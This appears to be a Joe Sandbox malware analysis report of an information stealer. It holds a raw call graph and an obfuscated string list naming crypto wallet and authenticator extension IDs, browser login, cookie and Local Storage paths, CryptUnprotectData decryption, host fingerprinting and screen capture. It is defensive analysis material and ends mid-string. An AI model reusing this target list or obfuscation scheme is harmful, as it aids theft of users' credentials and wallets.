74157->74185 74186 424bed GetPEB GetModuleFileNameW CreateFileW CloseHandle 74157->74186 74187 4228cf 74157->74187 74158 4279e0 GetPEB 74158->74163 74160 4269e4 GetPEB GetPEB 74160->74163 74161 41f9a4 51 API calls 74161->74163 74162 422177 51 API calls 74162->74163 74163->74130 74163->74131 74163->74132 74163->74134 74163->74135 74163->74136 74163->74137 74163->74139 74163->74140 74163->74141 74163->74142 74163->74143 74163->74145 74163->74146 74163->74147 74163->74149 74163->74150 74163->74153 74163->74154 74163->74155 74163->74156 74163->74157 74163->74158 74163->74160 74163->74161 74163->74162 74164 4244e4 3 API calls 74163->74164 74170 44814e 74163->74170 74183 424c8d 58 API calls ___std_exception_copy 74163->74183 74184 41eb3f RaiseException 74163->74184 74192 41ebeb 58 API calls 74163->74192 74193 41e6f0 58 API calls 74163->74193 74164->74163 74166->74125 74167->74125 74169->74113 74171 45699f 74170->74171 74172 4569b7 74171->74172 74173 4569ac 74171->74173 74175 4569bf 74172->74175 74181 4569c8 _unexpected 74172->74181 74174 44eb6f __fread_nolock 15 API calls 74173->74174 74179 4569b4 74174->74179 74176 44e224 ___free_lconv_mon 14 API calls 74175->74176 74176->74179 74177 4569f2 RtlReAllocateHeap 74177->74179 74177->74181 74178 4569cd 74194 4447a4 14 API calls __dosmaperr 74178->74194 74179->74163 74181->74177 74181->74178 74195 44e560 EnterCriticalSection LeaveCriticalSection _unexpected 74181->74195 74183->74163 74184->74163 74185->74157 74186->74157 74188 422958 74187->74188 74196 424995 20 API calls 2 library calls 74188->74196 74190 4244a9 74191 4262a1 58 API calls 74190->74191 74191->74190 74192->74163 74193->74163 74194->74179 74195->74181 74196->74190 74205 402ff9 74197->74205 74198 4033ee 74198->74096 74198->74198 74199 402fcc 6 API calls 74202 403349 74199->74202 74200 40112c 6 API calls 74200->74202 74201 402fcc 6 API calls 74201->74205 74202->74199 74202->74200 74202->74205 74310 40112c 8 API calls __aullrem 74202->74310 74203 401ff9 6 API calls 74203->74205 74205->74198 74205->74201 74205->74202 74205->74203 74206 402476 6 API calls 74205->74206 74206->74205 74208 40200e 74207->74208 74209 401c1e 6 API calls 74208->74209 74210 402426 ExitProcess 74208->74210 74211 402083 74208->74211 74212 402fcc 6 API calls 74208->74212 74215 402221 74208->74215 74311 401c1e 74208->74311 74209->74208 74211->74208 74213 40112c 6 API calls 74211->74213 74212->74208 74213->74211 74215->74096 74216 4020ce Sleep 74217 401c1e 6 API calls 74216->74217 74217->74208 74220 402482 74218->74220 74219 402af0 GetComputerNameW 74219->74220 74220->74219 74221 402be1 GetUserNameW 74220->74221 74222 401ff9 6 API calls 74220->74222 74223 402fcc 6 API calls 74220->74223 74224 402b69 74220->74224 74225 402476 6 API calls 74220->74225 74228 401c1e 6 API calls 74220->74228 74229 402555 74220->74229 74221->74220 74222->74220 74223->74220 74224->74096 74224->74224 74225->74220 74226 402476 6 API calls 74226->74229 74227 401ff9 6 API calls 74227->74229 74228->74220 74229->74220 74229->74226 74229->74227 74230 40112c 6 API calls 74229->74230 74230->74229 74242 43023b __CreateFrameInfo 74231->74242 74232 4309a8 74232->74096 74233 430228 206 API calls 74233->74242 74234 42f278 206 API calls 74234->74242 74235 42f625 206 API calls 74235->74242 74236 447e24 ___std_exception_copy 15 API calls 74236->74242 74237 438e28 3 API calls 74237->74242 74238 42fd35 206 API calls 74238->74242 74239 40b81c 43 API calls 74239->74242 74240 447a80 ___std_exception_destroy 14 API calls 74240->74242 74241 41f9a4 58 API calls 74241->74242 74242->74232 74242->74233 74242->74234 74242->74235 74242->74236 74242->74237 74242->74238 74242->74239 74242->74240 74242->74241 74243 40b7bb 43 API calls 74242->74243 74243->74242 74256 436af4 __fread_nolock __CreateFrameInfo _strlen 74244->74256 74245 436adc 176 API calls 74245->74256 74246 434fac 15 API calls 74246->74256 74247 438e28 LoadLibraryW GetPEB lstrcmpiW 74247->74256 74248 438e28 3 API calls 74253 438a76 GetPhysicallyInstalledSystemMemory 74248->74253 74249 438019 74249->74096 74250 438b8c EnumDisplayDevicesA 74250->74256 74251 437265 KiUserCallbackDispatcher 74251->74256 74252 419e6b 127 API calls 74252->74256 74253->74256 74255 434040 46 API calls 74255->74256 74256->74245 74256->74246 74256->74247 74256->74248 74256->74249 74256->74250 74256->74251 74256->74252 74256->74255 74257 41f9a4 58 API calls 74256->74257 74259 44568a 29 API calls 74256->74259 74318 41d057 74256->74318 74324 44be84 43 API calls __wfreopen_s 74256->74324 74325 4360e1 74256->74325 74257->74256 74259->74256 74276 434090 __CreateFrameInfo _wctomb_s _strlen 74261->74276 74262 434f14 RegCloseKey 74262->74276 74263 434be9 RegQueryValueExW 74263->74276 74264 4349e7 74264->74096 74265 434f73 RegCloseKey 74265->74276 74266 434d8e RegOpenKeyExW 74266->74276 74267 4346ce wsprintfW 74267->74276 74268 434706 RegEnumKeyExW 74268->74276 74269 434758 RegCloseKey 74269->74276 74270 434954 RegOpenKeyExW 74270->74276 74271 434ce5 wsprintfW 74271->74276 74273 419e6b 127 API calls 74273->74276 74274 434080 127 API calls 74274->74276 74275 447a80 14 API calls ___std_exception_destroy 74275->74276 74276->74262 74276->74263 74276->74264 74276->74265 74276->74266 74276->74267 74276->74268 74276->74269 74276->74270 74276->74271 74276->74273 74276->74274 74276->74275 74330 419496 106 API calls 3 library calls 74276->74330 74285 433c23 74277->74285 74278 433d34 74280 43323b 198 API calls 74280->74285 74281 419e6b 127 API calls 74281->74285 74282 434022 GetProcessHeap RtlFreeHeap 74282->74096 74283 4338b5 198 API calls 74283->74285 74285->74278 74285->74280 74285->74281 74285->74282 74285->74283 74331 430e6c 74285->74331 74352 43350d 200 API calls 74285->74352 74353 432718 74285->74353 74288 421f01 74287->74288 74289 4220b5 GetPEB 74288->74289 74290 4279e0 GetPEB 74288->74290 74291 421f6c NtQueryInformationProcess 74288->74291 74292 42215d 74288->74292 74289->74288 74290->74288 74291->74288 74292->74096 74294 4224b4 74293->74294 74295 422795 GetPEB 74294->74295 74296 4227be NtQueryInformationProcess 74294->74296 74297 4279e0 GetPEB 74294->74297 74298 422802 74294->74298 74295->74294 74296->74294 74297->74294 74298->74096 74309 42cfd0 74299->74309 74300 42d5bb 74300->74096 74301 42b9c5 223 API calls 74301->74309 74302 419b9d 72 API calls 74302->74309 74304 42cfba 223 API calls 74304->74309 74305 41a28f 182 API calls 74305->74309 74307 42c0da 223 API calls 74307->74309 74308 42b9ae 206 API calls 74308->74309 74309->74300 74309->74301 74309->74302 74309->74304 74309->74305 74309->74307 74309->74308 74402 42ca0d 74309->74402 74417 42ad82 74309->74417 74310->74205 74316 401c31 74311->74316 74312 401ebc GetSystemTimeAsFileTime 74312->74316 74313 401ff9 7 API calls 74313->74316 74314 401c1e 7 API calls 74314->74316 74315 401f62 __aulldiv 74315->74216 74315->74315 74316->74312 74316->74313 74316->74314 74316->74315 74317 402fcc 7 API calls 74316->74317 74317->74316 74319 447e24 ___std_exception_copy 15 API calls 74318->74319 74320 41d065 74319->74320 74321 438e28 3 API calls 74320->74321 74322 41d079 GetCurrentHwProfileA 74321->74322 74323 41d083 74322->74323 74323->74256 74324->74256 74329 436133 74325->74329 74326 43669e 74326->74256 74327 447e24 ___std_exception_copy 15 API calls 74327->74329 74328 4360e1 15 API calls 74328->74329 74329->74326 74329->74327 74329->74328 74330->74276 74350 430e85 74331->74350 74332 4321e3 GetDIBits ReleaseDC 74332->74350 74333 432097 GetProcessHeap 74333->74350 74334 431d2b RtlAllocateHeap 74334->74350 74335 43350d 186 API calls 74335->74350 74336 43323b 186 API calls 74336->74350 74337 431e4c GetObjectW 74337->74350 74338 4338b5 186 API calls 74338->74350 74339 4325bf GetProcessHeap 74339->74350 74340 433c10 186 API calls 74340->74350 74341 430f3a RtlAllocateHeap 74341->74350 74342 4228cf 58 API calls 74342->74350 74343 431c69 GetDC 74343->74350 74344 4314b2 GetProcessHeap 74344->74350 74345 4314e4 HeapAlloc 74345->74350 74346 430e6c 186 API calls 74346->74350 74347 4326e0 GetProcessHeap RtlFreeHeap GetProcessHeap HeapFree 74347->74285 74348 431902 74349 432b1b 186 API calls 74349->74350 74350->74332 74350->74333 74350->74334 74350->74335 74350->74336 74350->74337 74350->74338 74350->74339 74350->74340 74350->74341 74350->74342 74350->74343 74350->74344 74350->74345 74350->74346 74350->74347 74350->74348 74350->74349 74351 432718 186 API calls 74350->74351 74351->74350 74352->74285 74365 43272e 74353->74365 74354 432a26 BitBlt 74354->74365 74355 432a76 CreateCompatibleBitmap 74355->74365 74356 432a5b SelectObject 74356->74365 74357 432a0e SelectObject 74357->74365 74358 4338b5 193 API calls 74358->74365 74359 432893 CreateCompatibleDC 74359->74365 74360 432943 74361 432afb DeleteDC DeleteObject 74361->74285 74363 430e6c 193 API calls 74363->74365 74365->74354 74365->74355 74365->74356 74365->74357 74365->74358 74365->74359 74365->74360 74365->74361 74365->74363 74366 432718 193 API calls 74365->74366 74367 432b1b 74365->74367 74379 43350d 200 API calls 74365->74379 74366->74365 74376 432b24 74367->74376 74368 430e6c 197 API calls 74368->74376 74369 432718 197 API calls 74369->74376 74370 432eb3 SystemParametersInfoW 74370->74376 74371 4338b5 197 API calls 74371->74376 74372 433c10 197 API calls 74372->74376 74373 43302c GetDesktopWindow GetDC 74373->74376 74374 432fe8 74374->74365 74375 432b1b 197 API calls 74375->74376 74376->74368 74376->74369 74376->74370 74376->74371 74376->74372 74376->74373 74376->74374 74376->74375 74377 43350d 197 API calls 74376->74377 74380 43323b 74376->74380 74377->74376 74379->74365 74382 433253 74380->74382 74381 43341c GetSystemMetrics 74381->74382 74382->74381 74383 43327e CreateDCW 74382->74383 74384 432718 196 API calls 74382->74384 74385 433448 74382->74385 74386 4334f3 DeleteDC 74382->74386 74387 4333c1 GetSystemMetrics 74382->74387 74388 43350d 196 API calls 74382->74388 74390 4338b5 74382->74390 74383->74382 74384->74382 74385->74385 74386->74376 74387->74382 74388->74382 74398 4338cd 74390->74398 74391 432b1b 199 API calls 74391->74398 74392 43323b 199 API calls 74392->74398 74393 432718 199 API calls 74393->74398 74394 4338b5 199 API calls 74394->74398 74395 4339bb 74396 433c10 199 API calls 74396->74398 74397 433be8 74400 430e6c 199 API calls 74397->74400 74398->74391 74398->74392 74398->74393 74398->74394 74398->74395 74398->74396 74398->74397 74399 430e6c 199 API calls 74398->74399 74399->74398 74401 433bfc DeleteObject 74400->74401 74401->74382 74410 42ca20 74402->74410 74403 40e14e 161 API calls 74403->74410 74404 42ca0d 223 API calls 74404->74410 74405 42ad82 223 API calls 74405->74410 74407 42cfa7 74412 447a80 ___std_exception_destroy 14 API calls 74407->74412 74408 447e24 ___std_exception_copy 15 API calls 74408->74410 74409 42cb4e 74409->74409 74410->74403 74410->74404 74410->74405 74410->74407 74410->74408 74410->74409 74411 42cfba 223 API calls 74410->74411 74413 438e28 3 API calls 74410->74413 74414 40b7bb 43 API calls 74410->74414 74434 42b9ae 74410->74434 74437 42b9c5 74410->74437 74411->74410 74416 42cfb2 74412->74416 74413->74410 74414->74410 74416->74309 74433 42ad95 74417->74433 74418 447e24 15 API calls ___std_exception_copy 74418->74433 74419 447a80 ___std_exception_destroy 14 API calls 74419->74433 74421 42b9ae 206 API calls 74421->74433 74422 42b7f1 74423 42b99e 74425 447a80 ___std_exception_destroy 14 API calls 74423->74425 74424 42cfba 223 API calls 74424->74433 74428 42b9a6 74425->74428 74426 42ad82 223 API calls 74426->74433 74427 438e28 LoadLibraryW GetPEB lstrcmpiW 74427->74433 74428->74309 74429 42b9c5 223 API calls 74429->74433 74430 40b7bb 43 API calls 74430->74433 74431 42ca0d 223 API calls 74431->74433 74432 40e14e 161 API calls 74432->74433 74433->74418 74433->74419 74433->74421 74433->74422 74433->74423 74433->74424 74433->74426 74433->74427 74433->74429 74433->74430 74433->74431 74433->74432 74451 42c0da 74433->74451 74435 430228 206 API calls 74434->74435 74436 42b9c1 74435->74436 74436->74410 74449 42b9d5 74437->74449 74438 42c04f 74439 42ad82 223 API calls 74439->74449 74440 42ca0d 223 API calls 74440->74449 74441 42b9ae 206 API calls 74441->74449 74442 42b9c5 223 API calls 74442->74449 74443 447e24 ___std_exception_copy 15 API calls 74443->74449 74444 438e28 3 API calls 74444->74449 74445 42c0ca 74446 447a80 ___std_exception_destroy 14 API calls 74445->74446 74448 42c0d2 74446->74448 74447 40b7bb 43 API calls 74447->74449 74448->74410 74449->74438 74449->74439 74449->74440 74449->74441 74449->74442 74449->74443 74449->74444 74449->74445 74449->74447 74450 40e14e 161 API calls 74449->74450 74450->74449 74467 42c0ed 74451->74467 74452 42c878 74452->74452 74453 42c0da 223 API calls 74453->74467 74454 40b7bb 43 API calls 74454->74467 74455 447e24 15 API calls ___std_exception_copy 74455->74467 74456 42b9c5 223 API calls 74456->74467 74457 42ad82 223 API calls 74457->74467 74458 42c9fd 74463 447a80 ___std_exception_destroy 14 API calls 74458->74463 74459 447a80 14 API calls ___std_exception_destroy 74459->74467 74460 40e14e 161 API calls 74460->74467 74461 42b9ae 206 API calls 74461->74467 74462 42cfba 223 API calls 74462->74467 74465 42ca05 74463->74465 74464 438e28 3 API calls 74464->74467 74465->74433 74466 42ca0d 223 API calls 74466->74467 74467->74452 74467->74453 74467->74454 74467->74455 74467->74456 74467->74457 74467->74458 74467->74459 74467->74460 74467->74461 74467->74462 74467->74464 74467->74466 74468->74101 74469->74101 74471 443a37 74470->74471 74472 443a49 74470->74472 74497 4438d3 GetModuleHandleW 74471->74497 74482 443b8c 74472->74482 74475 443a3c 74475->74472 74498 443916 GetModuleHandleExW 74475->74498 74477 43ca83 74477->74057 74481 443a9b 74483 443b98 ___scrt_is_nonwritable_in_current_image 74482->74483 74504 44d13d EnterCriticalSection 74483->74504 74485 443ba2 74505 443aa1 74485->74505 74487 443baf 74509 443bcd 74487->74509 74490 4439ba 74514 443998 74490->74514 74493 4439d8 74495 443916 CallUnexpected 3 API calls 74493->74495 74494 4439c8 GetCurrentProcess TerminateProcess 74494->74493 74496 4439e0 ExitProcess 74495->74496 74497->74475 74499 443955 GetProcAddress 74498->74499 74500 443976 74498->74500 74499->74500 74501 443969 74499->74501 74502 443985 74500->74502 74503 44397c FreeLibrary 74500->74503 74501->74500 74502->74472 74503->74502 74504->74485 74506 443aad ___scrt_is_nonwritable_in_current_image 74505->74506 74508 443b14 CallUnexpected 74506->74508 74512 44446f 14 API calls 2 library calls 74506->74512 74508->74487 74513 44d154 LeaveCriticalSection 74509->74513 74511 443a80 74511->74477 74511->74490 74512->74508 74513->74511 74519 44fb15 GetPEB 74514->74519 74517 4439a2 GetPEB 74518 4439b4 74517->74518 74518->74493 74518->74494 74520 44fb2f 74519->74520 74522 44399d 74519->74522 74523 44ced5 74520->74523 74522->74517 74522->74518 74526 44cfe0 74523->74526 74527 44d00e 74526->74527 74531 44cef1 74526->74531 74527->74531 74533 44cf15 74527->74533 74530 44d028 GetProcAddress 74530->74531 74532 44d038 _unexpected 74530->74532 74531->74522 74532->74531 74539 44cf26 ___vcrt_InitializeCriticalSectionEx 74533->74539 74534 44cfbc 74534->74530 74534->74531 74535 44cf44 LoadLibraryExW 74536 44cfc3 74535->74536 74537 44cf5f GetLastError 74535->74537 74536->74534 74538 44cfd5 FreeLibrary 74536->74538 74537->74539 74538->74534 74539->74534 74539->74535 74540 44cf92 LoadLibraryExW 74539->74540 74540->74536 74540->74539 74541 450330 74544 45033d _unexpected 74541->74544 74542 45037d 74549 4447a4 14 API calls __dosmaperr 74542->74549 74543 450368 RtlAllocateHeap 74543->74544 74545 45037b 74543->74545 74544->74542 74544->74543 74548 44e560 EnterCriticalSection LeaveCriticalSection _unexpected 74544->74548 74548->74544 74549->74545 74550 426b04 74551 426b49 __fread_nolock 74550->74551 74552 426f39 74551->74552 74553 447e24 ___std_exception_copy 15 API calls 74551->74553 74554 447a80 ___std_exception_destroy 14 API calls 74552->74554 74553->74551 74555 426f52 74554->74555 74556 2f6978e 74557 2f6979d 74556->74557 74560 2f69f2e 74557->74560 74566 2f69f49 74560->74566 74561 2f69f52 CreateToolhelp32Snapshot 74562 2f69f6e Module32First 74561->74562 74561->74566 74563 2f69f7d 74562->74563 74565 2f697a6 74562->74565 74567 2f69bed 74563->74567 74566->74561 74566->74562 74568 2f69c18 74567->74568 74569 2f69c61 74568->74569 74570 2f69c29 VirtualAlloc 74568->74570 74569->74569 74570->74569 74571 4052d9 74582 4052ee __fread_nolock 74571->74582 74572 405900 74573 438e28 3 API calls 74573->74582 74575 40b129 43 API calls 74575->74582 74577 438e28 3 API calls 74579 405567 CryptUnprotectData 74577->74579 74578 447e24 15 API calls ___std_exception_copy 74578->74582 74581 447a80 ___std_exception_destroy 14 API calls 74579->74581 74581->74582 74582->74572 74582->74573 74582->74575 74582->74577 74582->74578 74583 447a80 ___std_exception_destroy 14 API calls 74582->74583 74584 4035d1 45 API calls 74582->74584 74585 405aaa 74582->74585 74604 434fac 74582->74604 74583->74582 74584->74582 74593 405ac3 __CreateFrameInfo 74585->74593 74586 406018 lstrcatW 74586->74593 74587 4060e6 74588 405ebc lstrcatW 74592 4360e1 15 API calls 74588->74592 74589 405be7 lstrcatW 74589->74593 74591 405eed lstrcatW 74596 4360e1 15 API calls 74591->74596 74595 405ed0 lstrcatW lstrcatW 74592->74595 74593->74586 74593->74587 74593->74588 74593->74589 74593->74591 74594 403600 101 API calls 74593->74594 74597 405bb6 74593->74597 74610 4048e2 46 API calls 74593->74610 74611 404988 46 API calls 74593->74611 74594->74593 74595->74593 74599 405eff lstrcatW lstrcatW 74596->74599 74600 4360e1 15 API calls 74597->74600 74599->74593 74601 4061ef 74600->74601 74602 40e14e 161 API calls 74601->74602 74603 406203 74602->74603 74603->74582 74609 434fc2 _strcat _strncpy _strlen 74604->74609 74605 434fac 15 API calls 74605->74609 74606 447e24 ___std_exception_copy 15 API calls 74606->74609 74607 435e8e 74607->74582 74608 4360e1 15 API calls 74608->74609 74609->74605 74609->74606 74609->74607 74609->74608 74610->74593 74611->74593 74612 4102de 74613 44814e 16 API calls 74612->74613 74614 4102f1 74613->74614

                                                          Executed Functions

                                                          Function 004069A1 Relevance: 208.6, APIs: 6, Strings: 112, Instructions: 2052stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,?), ref: 00406AFC
                                                          • lstrcatW.KERNEL32(?,\Local Storage\leveldb), ref: 00406B06
                                                          • lstrcatW.KERNEL32(?,?,?), ref: 00408A66
                                                          • lstrcatW.KERNEL32(?,/BrowserDB), ref: 00408A70
                                                          Strings
                                                          • lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm, xrefs: 00408084
                                                          • Au576xedthy, xrefs: 00406CF1
                                                          • W576xedeb Da576xedta, xrefs: 00408697
                                                          • Pol576xedymesh, xrefs: 004075AC
                                                          • fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp, xrefs: 00408128
                                                          • Wom576xedbat, xrefs: 004077AD
                                                          • NeoL576xedine, xrefs: 00407CB2
                                                          • nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd, xrefs: 00407D4F
                                                          • Nab576xedox, xrefs: 00408018
                                                          • cihm576xedoadaighcej576xedopammfbmddcmdekcje, xrefs: 004086BB
                                                          • bhgho576xedamapcdpbohphigoo576xedoaddinpkbai, xrefs: 004074C9
                                                          • GAu576xedth Authe576xednticator, xrefs: 00407298
                                                          • infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf, xrefs: 00407868
                                                          • Cy576xedano, xrefs: 00407AE5
                                                          • UL6T, xrefs: 0040702D
                                                          • Ste576xedem Key576xedchain, xrefs: 0040827B
                                                          • VL6T, xrefs: 0040891C
                                                          • ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec, xrefs: 00407625
                                                          • lodccj576xedjbdhfakaekdiahmedf576xedbieldgik, xrefs: 00407FBB
                                                          • Me576xedtaMa576xedsk, xrefs: 00406E46, 004087D8
                                                          • kpfop576xedkelmapcoipemfend576xedmdcghnegimn, xrefs: 00407EED
                                                          • By576xedone, xrefs: 004076ED
                                                          • ME576xedW CX, xrefs: 004073DD
                                                          • Ron576xedin Wall576xedet, xrefs: 004085CE
                                                          • Te576xedrra Stat576xedion, xrefs: 0040724B
                                                          • ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb, xrefs: 00408152
                                                          • afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc, xrefs: 004083E2
                                                          • bln576xedieiiffboi576xedllknjnepogjhkgnoapac, xrefs: 00408804
                                                          • nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig, xrefs: 00407C99
                                                          • Lo576xedgin Da576xedta, xrefs: 0040864F
                                                          • kkpllko576xeddjeloidieedojogacfhp576xedaihoh, xrefs: 004088A7
                                                          • /BrowserDB, xrefs: 00408A68
                                                          • Ja576xedxx Lib576xederty, xrefs: 0040881F
                                                          • dmkam576xedcknogkgcdfhhbddcghach576xedkejeap, xrefs: 004084B0
                                                          • Te576xedzBox, xrefs: 00407F84
                                                          • EQ576xedUAL, xrefs: 004076A5
                                                          • fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi, xrefs: 00408856
                                                          • nknhi576xedehlklippafakaeklbegl576xedecifhad, xrefs: 00408027
                                                          • ejbalbako576xedplchlghecda576xedlmeeeajnimhm, xrefs: 00406E55
                                                          • cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae, xrefs: 00407593
                                                          • ICO576xedNex, xrefs: 004075D4
                                                          • gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb, xrefs: 00406D00
                                                          • Gu576xedild, xrefs: 004081EB
                                                          • Au576xedro, xrefs: 00407584
                                                          • Coi576xedn98, xrefs: 00407492
                                                          • nhnk576xedbkgjikgcigadomkph576xedalanndcapjk, xrefs: 004087BC
                                                          • EnK576xedrypt, xrefs: 00408897
                                                          • kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd, xrefs: 00407479
                                                          • fhmfend576xedgdocmcbmfikdcog576xedofphimnkno, xrefs: 00408903
                                                          • hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad, xrefs: 0040840A
                                                          • Zi576xedlPay, xrefs: 0040746A
                                                          • Ma576xedth, xrefs: 004083D3
                                                          • Coinb576xedase, xrefs: 004083FB
                                                          • nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm, xrefs: 004081D0
                                                          • Hist576xedory, xrefs: 0040867F
                                                          • Bin576xedance Cha576xedin Wal576xedlet, xrefs: 004085F6
                                                          • Ke576xedplr, xrefs: 004084A0
                                                          • E576xedOS Authenti576xedcator, xrefs: 00406D19
                                                          • mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh, xrefs: 00407F93
                                                          • oel576xedjdldpnmdbchonieli576xeddgobddffflal, xrefs: 00406D28
                                                          • Tro576xednLi576xednk, xrefs: 00407616
                                                          • jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf, xrefs: 004075BB
                                                          • His576xedtory, xrefs: 004083AF
                                                          • Na576xedsh Ex576xedtension, xrefs: 0040809F
                                                          • Tr576xedezor Passw576xedord Manager, xrefs: 00408207
                                                          • aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp, xrefs: 0040725B
                                                          • Pha576xedntom, xrefs: 0040822F
                                                          • Uni576xedSat, xrefs: 004082D2
                                                          • One576xedKey, xrefs: 00407859
                                                          • Log576xedin Da576xedta Fo576xedr Acc576xedount, xrefs: 00408667
                                                          • dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm, xrefs: 00407AF8
                                                          • Gua576xedrda, xrefs: 00408423
                                                          • kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj, xrefs: 0040887E
                                                          • hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln, xrefs: 0040768A
                                                          • iW576xedlt, xrefs: 0040886F
                                                          • nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj, xrefs: 00407D13
                                                          • ilgcn576xedhelpchnceeipipij576xedaljkblbcobl, xrefs: 004072A7
                                                          • Sa576xedturn, xrefs: 00407C8A
                                                          • VL6T, xrefs: 004076C1
                                                          • hcflp576xedincpppdclinealmandi576xedjcmnkbgn, xrefs: 0040804F
                                                          • nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn, xrefs: 004087E8
                                                          • Bit576xedApp, xrefs: 00408847
                                                          • Ni576xedfty, xrefs: 0040816B
                                                          • EeS, xrefs: 00406B7F
                                                          • flpici576xedilemghbmfalica576xedjoolhkkenfel, xrefs: 004075E4
                                                          • Liqu576xedality, xrefs: 00407EDD
                                                          • Aut576xedhenti576xedcator, xrefs: 004074BA
                                                          • Cl576xedover, xrefs: 004087AC
                                                          • fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec, xrefs: 004085DD
                                                          • Hy576xedcon Lite Cli576xedent, xrefs: 004080C7
                                                          • Te576xedmple, xrefs: 00408068
                                                          • amkmj576xedjmmflddogmhpjloim576xedipbofnfjih, xrefs: 004073C2
                                                          • Le576xedaf, xrefs: 00407881
                                                          • KH576xedC, xrefs: 00408040
                                                          • onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl, xrefs: 004080AE
                                                          • aea576xedchknmefphepccio576xednboohckonoeemg, xrefs: 004074A1
                                                          • ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc, xrefs: 00407F69
                                                          • ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml, xrefs: 00407FE3
                                                          • EeS, xrefs: 00407043
                                                          • DAp576xedpPlay, xrefs: 00407FAC
                                                          • jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid, xrefs: 00407D6E
                                                          • cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne, xrefs: 0040882E
                                                          • bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa, xrefs: 00408242
                                                          • cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao, xrefs: 00407CC1
                                                          • Bi576xedtClip, xrefs: 00407FD4
                                                          • Netw576xedork\Cook576xedies, xrefs: 00408505
                                                          • Sol576xedlet, xrefs: 004088F4
                                                          • \Local Storage\leveldb, xrefs: 00406AFE
                                                          • Yo576xedroi, xrefs: 00408143
                                                          • imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk, xrefs: 00408216
                                                          • ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo, xrefs: 004082E5
                                                          • bcopg576xedchhojmggmff576xedilplmbdicgaihlkp, xrefs: 004080DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: /BrowserDB$Au576xedro$Au576xedthy$Aut576xedhenti576xedcator$Bi576xedtClip$Bin576xedance Cha576xedin Wal576xedlet$Bit576xedApp$By576xedone$Cl576xedover$Coi576xedn98$Coinb576xedase$Cy576xedano$DAp576xedpPlay$E576xedOS Authenti576xedcator$EQ576xedUAL$EnK576xedrypt$EeS$EeS$GAu576xedth Authe576xednticator$Gu576xedild$Gua576xedrda$His576xedtory$Hist576xedory$Hy576xedcon Lite Cli576xedent$ICO576xedNex$Ja576xedxx Lib576xederty$KH576xedC$Ke576xedplr$Le576xedaf$Liqu576xedality$Lo576xedgin Da576xedta$Log576xedin Da576xedta Fo576xedr Acc576xedount$ME576xedW CX$Ma576xedth$Me576xedtaMa576xedsk$Na576xedsh Ex576xedtension$Nab576xedox$NeoL576xedine$Netw576xedork\Cook576xedies$Ni576xedfty$One576xedKey$Pha576xedntom$Pol576xedymesh$Ron576xedin Wall576xedet$Sa576xedturn$Sol576xedlet$Ste576xedem Key576xedchain$Te576xedmple$Te576xedrra Stat576xedion$Te576xedzBox$Tr576xedezor Passw576xedord Manager$Tro576xednLi576xednk$UL6T$Uni576xedSat$VL6T$VL6T$W576xedeb Da576xedta$Wom576xedbat$Yo576xedroi$Zi576xedlPay$\Local Storage\leveldb$aea576xedchknmefphepccio576xednboohckonoeemg$afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc$aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp$amkmj576xedjmmflddogmhpjloim576xedipbofnfjih$bcopg576xedchhojmggmff576xedilplmbdicgaihlkp$bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa$bhgho576xedamapcdpbohphigoo576xedoaddinpkbai$bln576xedieiiffboi576xedllknjnepogjhkgnoapac$cihm576xedoadaighcej576xedopammfbmddcmdekcje$cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne$cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae$cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao$dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm$dmkam576xedcknogkgcdfhhbddcghach576xedkejeap$ejbalbako576xedplchlghecda576xedlmeeeajnimhm$ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb$fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp$fhmfend576xedgdocmcbmfikdcog576xedofphimnkno$fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi$flpici576xedilemghbmfalica576xedjoolhkkenfel$fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec$gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb$hcflp576xedincpppdclinealmandi576xedjcmnkbgn$hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad$hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln$iW576xedlt$ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec$ijmp576xedgkjfkbfho576xed